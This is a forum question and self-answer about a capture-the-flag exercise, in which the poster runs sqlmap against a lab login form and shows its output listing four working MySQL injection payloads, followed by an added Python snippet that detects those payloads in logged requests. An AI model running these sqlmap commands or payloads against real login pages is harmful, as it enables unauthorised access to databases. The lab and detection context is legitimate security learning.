I am currently working on a CTF. I managed to log into the app using manual SQLi in the password field. I then asked SQLMap to find more info, to no avail. Here is the command I use:

sqlmap -u http://10.150.150.146/reviewer/login/ --method=POST --data "username=admin&password=pass&btn-Login=Log+In" --dbs --no-cast --level 5 --risk 3 --cookie PHPSESSID=0e0933c639dba6d54e816cdfbb19feec

[09:01:59] [INFO] resuming back-end DBMS 'mysql' 
[09:01:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: username=admin&password=pass' OR NOT 4192=4192#&btn-login=Log In

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=admin&password=pass' AND (SELECT 6862 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(6862=6862,1))),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MvXZ&btn-login=Log In

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=admin&password=pass';SELECT SLEEP(5)#&btn-login=Log In

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin&password=pass' AND (SELECT 5913 FROM (SELECT(SLEEP(5)))doyo)-- mrUr&btn-login=Log In
---
[09:01:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.46, PHP 7.4.14
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:01:59] [INFO] fetching database names
[09:01:59] [WARNING] the SQL query provided does not return any output
[09:01:59] [INFO] fetching number of databases
[09:01:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:01:59] [INFO] retrieved: 
[09:01:59] [WARNING] time-based comparison requires larger statistical model, please wait......................... (done)                                                                                                                  
[09:02:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[09:02:01] [ERROR] unable to retrieve the number of databases
[09:02:01] [INFO] falling back to current database
[09:02:01] [INFO] fetching current database
[09:02:01] [INFO] resumed: ''
[09:02:01] [CRITICAL] unable to retrieve the database names
[09:02:01] [INFO] fetched data logged to text files under '/home/hidden/.local/share/sqlmap/output/10.150.150.146'

I am pretty new to this and don't have a clue as to why I can't even get the DB name. Any help would be much appreciated.

Crouzilles

1 Answer

I sorted out my problem by saving the request to a file and then I used this SQLMap command:

sqlmap -r login.raw --dbs

This ended up listing all the DBs and I was able to continue from there.

Crouzilles
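
A defender's view of the four payloads sqlmap lists in the question, as an added example that is not part of the original post: a small Python check that decodes a logged POST body and labels which of those technique classes each form field matches. The function names and the sample bodies are constructed for illustration, and the regexes are narrow heuristics keyed to the payload shapes shown above, not a complete SQLi filter.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Heuristic signatures for the four technique classes in the sqlmap output above.
SIGNATURES = {
    # Numeric tautology such as "OR NOT 4192=4192"
    "boolean-based": re.compile(r"\b(?:OR|AND)\s+(?:NOT\s+)?(\d+)\s*=\s*\1\b", re.I),
    # Duplicate-key error trick: FLOOR(RAND(...)) combined with GROUP BY
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(.*GROUP\s+BY", re.I | re.S),
    # A second statement appended after a semicolon
    "stacked": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    # Delay functions used for timing inference
    "time-based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}


def classify(body):
    """Map each field of a URL-encoded POST body to the signature names it matches."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        labels = {label for label, rx in SIGNATURES.items() if rx.search(value)}
        if labels:
            hits.setdefault(name, set()).update(labels)
    return hits


def make_body(password):
    # Constructed sample: the same three form fields as the login request in the question.
    return urlencode({"username": "admin", "password": password, "btn-login": "Log In"})


# Constructed log bodies; the password values are the payloads quoted in the question.
SAMPLES = {
    "benign": make_body("pass"),
    "boolean": make_body("pass' OR NOT 4192=4192#"),
    "error": make_body(
        "pass' AND (SELECT 6862 FROM(SELECT COUNT(*),CONCAT(0x7176787071,"
        "(SELECT (ELT(6862=6862,1))),0x716a6a6a71,FLOOR(RAND(0)*2))x "
        "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MvXZ"
    ),
    "stacked": make_body("pass';SELECT SLEEP(5)#"),
    "time": make_body("pass' AND (SELECT 5913 FROM (SELECT(SLEEP(5)))doyo)-- mrUr"),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:8} -> {classify(body)}")
```

The stacked-query sample is flagged under two labels because it appends a statement and also calls `SLEEP`.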